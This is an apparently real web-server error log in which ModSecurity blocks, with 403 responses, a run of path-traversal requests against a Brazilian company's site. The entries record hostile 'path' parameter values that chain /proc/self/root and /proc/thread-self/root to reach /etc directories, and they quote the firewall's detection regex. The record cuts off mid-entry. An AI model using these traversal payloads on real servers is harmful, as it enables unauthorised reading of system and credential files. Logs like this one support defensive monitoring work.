[Tue Mar 17 09:34:20.083848 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:50722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKTAeiSKl8TjouI-YCjgAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:21.214180 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.203:52216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKTQeiSKl8TjouI-YCkAAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:34:22.558270 2026] [:error] [pid 2553:tid 140411741927168] [client 74.7.243.203:52226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKTv0Bec_B9OkZP_i9bgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:23.882132 2026] [:error] [pid 2159:tid 140411699963648] [client 74.7.243.203:52230] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKT_ct6CQ8jnRyg2p8tQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:25.236272 2026] [:error] [pid 2159:tid 140411649607424] [client 74.7.243.203:52242] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKUfct6CQ8jnRyg2p8tgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:26.547508 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.243.203:52258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKUu82sZHvlq4xgHrCvQAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:27.882424 2026] [:error] [pid 1210:tid 140411725141760] [client 74.7.243.203:52262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKU1KJy4A1bGlmj9BWCAAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:29.207427 2026] [:error] [pid 1731:tid 140411574073088] [client 74.7.243.203:52268] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKVQb2qCuy5irgBMjJpwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:30.574299 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.243.203:55898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKVtCmCSWTlPouqorMSAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:31.901469 2026] [:error] [pid 2159:tid 140411616036608] [client 74.7.243.203:55904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKV_ct6CQ8jnRyg2p8ugAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:33.095098 2026] [:error] [pid 2553:tid 140411699963648] [client 74.7.243.203:55914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKWf0Bec_B9OkZP_i9cgAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:34.394034 2026] [:error] [pid 1210:tid 140411540502272] [client 74.7.243.203:55926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKWlKJy4A1bGlmj9BWDwAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:37.813379 2026] [:error] [pid 11469:tid 140411658000128] [client 74.7.243.203:55930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKXZDEJR9VXonE_-1PYwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:39.138329 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.243.203:55934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKX5qmL8PQht4WJFlIPwAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:41.545569 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:43618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKYaBJNF7axNlVR0X9LAAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:42.934167 2026] [:error] [pid 1210:tid 140411691570944] [client 74.7.243.203:43624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKYlKJy4A1bGlmj9BWGQAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:44.259811 2026] [:error] [pid 1016:tid 140411624429312] [client 74.7.243.203:43632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKZJqmL8PQht4WJFlIQgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:45.482475 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:43638] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKZQeiSKl8TjouI-YClwAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:46.707773 2026] [:error] [pid 2159:tid 140411590858496] [client 74.7.243.203:43654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKZvct6CQ8jnRyg2p8wQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:48.098709 2026] [:error] [pid 1016:tid 140411540502272] [client 74.7.243.203:43664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKaJqmL8PQht4WJFlIRAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:49.444564 2026] [:error] [pid 2159:tid 140411716749056] [client 74.7.243.203:43666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKafct6CQ8jnRyg2p8wgAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:56.107518 2026] [:error] [pid 1210:tid 140411666392832] [client 74.7.243.203:48994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 